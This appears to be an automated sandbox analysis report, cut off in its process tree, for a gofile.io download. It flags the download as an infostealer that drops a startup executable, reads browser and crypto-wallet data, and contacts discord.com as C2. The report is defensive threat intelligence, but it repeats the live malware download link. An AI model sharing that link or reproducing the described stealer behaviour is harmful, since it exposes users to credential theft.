hxxps://gofile[.]io/d/ssgore

Resubmissions

20-07-2024 08:55

240720-kveevaydqc 8

20-07-2024 07:28

240720-jawmyswcjc 8

20-07-2024 07:23

240720-h7vw9asbqm 8

Analysis

max time kernel
1200s
max time network
1160s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
20-07-2024 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/ssgore

Score

8^/10

discovery pyinstaller spyware stealer

Malware Config

Signatures

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe	Setup.exe

Executes dropped EXE 7 IoCs

pid	Process
5828	processhacker-2.39-setup.exe
5996	processhacker-2.39-setup.tmp
4680	ProcessHacker.exe
1656	peview.exe
2208	Setup.exe
3924	Setup.exe
924	ProcessHacker.exe

Loads dropped DLL 62 IoCs

pid	Process
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
3924	Setup.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe
924	ProcessHacker.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	ProcessHacker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 25 IoCs

Web Service

T1102

flow	ioc
177	discord.com
180	discord.com
184	discord.com
163	discord.com
173	discord.com
195	discord.com
200	discord.com
196	discord.com
160	discord.com
165	discord.com
181	discord.com
185	discord.com
193	discord.com
194	discord.com
199	discord.com
158	discord.com
172	discord.com
183	discord.com
197	discord.com
198	discord.com
171	discord.com
175	discord.com
176	discord.com
186	discord.com
182	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
78	api.ipify.org
152	api.ipify.org

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	ProcessHacker.exe

Drops file in Program Files directory 63 IoCs

description	ioc	Process
File created	C:\Program Files\Process Hacker 2\plugins\is-CKP5E.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\unins000.dat	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\msedge.exe.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\msedge.dll.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\plugins\DotNetTools.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\dll\oneds.dll.pdb	ProcessHacker.exe
File created	C:\Program Files\Process Hacker 2\is-0L73J.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\peview.exe	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\ExtendedTools.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\ToolStatus.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-NELS3.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-8ILL6.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\combase.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\oneds.dll.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\plugins\NetworkTools.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\directmanipulation.pdb	ProcessHacker.exe
File created	C:\Program Files\Process Hacker 2\is-CAE4C.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\ntdll.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\symbols\dll\ntdll.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\symbols\dll\msedge.dll.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\dll\combase.pdb	ProcessHacker.exe
File created	C:\Program Files\Process Hacker 2\is-PEPSR.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-RUON8.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\HardwareDevices.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-V8P4K.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\UserNotes.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\dll\ntdll.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\symbols\dll\directmanipulation.pdb	ProcessHacker.exe
File created	C:\Program Files\Process Hacker 2\x86\plugins\is-EB2EP.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-01BJ6.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-GVL4J.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-N2QBS.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\symbols\dll\combase.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\symbols\dll\wininet.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\exe\msedge.exe.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\x86\ProcessHacker.exe	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\WindowExplorer.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-VUE8T.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\ExtendedNotifications.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-NDFBA.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\x86\plugins\DotNetTools.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\x86\is-RL0G0.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-9PT0E.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-SIAFF.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\symbols\dll\oneds.dll.pdb	ProcessHacker.exe
File created	C:\Program Files\Process Hacker 2\is-K33SB.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\wininet.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\dll\wininet.pdb	ProcessHacker.exe
File created	C:\Program Files\Process Hacker 2\is-KRDMU.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\Updater.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\unins000.dat	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-ULURC.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-JE1CV.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-IVVT9.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-7K5PL.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\symbols\exe\msedge.exe.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\ProcessHacker.exe	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\dll\msedge.dll.pdb	ProcessHacker.exe
File opened for modification	C:\Program Files\Process Hacker 2\dll\directmanipulation.pdb	ProcessHacker.exe
File created	C:\Program Files\Process Hacker 2\plugins\is-5GAGO.tmp	processhacker-2.39-setup.tmp

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000200000002abb2-863.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Control	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Control	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters	ProcessHacker.exe

Checks processor information in registry 2 TTPs 17 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	ProcessHacker.exe
Key opened	\Registry\Machine\Hardware\Description\System\CentralProcessor	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	ProcessHacker.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	ProcessHacker.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	ProcessHacker.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	ProcessHacker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3666881604-935092360-1617577973-1000\{16FF4E9D-C387-47DA-B903-47A69DBED33B}	msedge.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 703914.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\processhacker-2.39-setup.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 679635.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Setup.exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
328	msedge.exe
328	msedge.exe
2168	msedge.exe
2168	msedge.exe
3040	identity_helper.exe
3040	identity_helper.exe
1288	msedge.exe
1288	msedge.exe
3000	msedge.exe
3000	msedge.exe
5600	msedge.exe
5600	msedge.exe
5996	processhacker-2.39-setup.tmp
5996	processhacker-2.39-setup.tmp
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4680	ProcessHacker.exe
924	ProcessHacker.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
684	Process not Found
684	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs

pid	Process
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	4680	ProcessHacker.exe
Token: SeIncBasePriorityPrivilege	4680	ProcessHacker.exe
Token: 33	4680	ProcessHacker.exe
Token: SeLoadDriverPrivilege	4680	ProcessHacker.exe
Token: SeProfSingleProcessPrivilege	4680	ProcessHacker.exe
Token: SeRestorePrivilege	4680	ProcessHacker.exe
Token: SeShutdownPrivilege	4680	ProcessHacker.exe
Token: SeTakeOwnershipPrivilege	4680	ProcessHacker.exe
Token: SeDebugPrivilege	924	ProcessHacker.exe
Token: SeIncBasePriorityPrivilege	924	ProcessHacker.exe
Token: 33	924	ProcessHacker.exe
Token: SeLoadDriverPrivilege	924	ProcessHacker.exe
Token: SeProfSingleProcessPrivilege	924	ProcessHacker.exe
Token: SeRestorePrivilege	924	ProcessHacker.exe
Token: SeShutdownPrivilege	924	ProcessHacker.exe
Token: SeTakeOwnershipPrivilege	924	ProcessHacker.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
5996	processhacker-2.39-setup.tmp
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
2168	msedge.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe
4680	ProcessHacker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 1852	2168	msedge.exe	81
PID 2168 wrote to memory of 1852	2168	msedge.exe	81
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 1048	2168	msedge.exe	82
PID 2168 wrote to memory of 328	2168	msedge.exe	83
PID 2168 wrote to memory of 328	2168	msedge.exe	83
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84
PID 2168 wrote to memory of 1100	2168	msedge.exe	84

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/ssgore
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcec6c3cb8,0x7ffcec6c3cc8,0x7ffcec6c3cd8
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
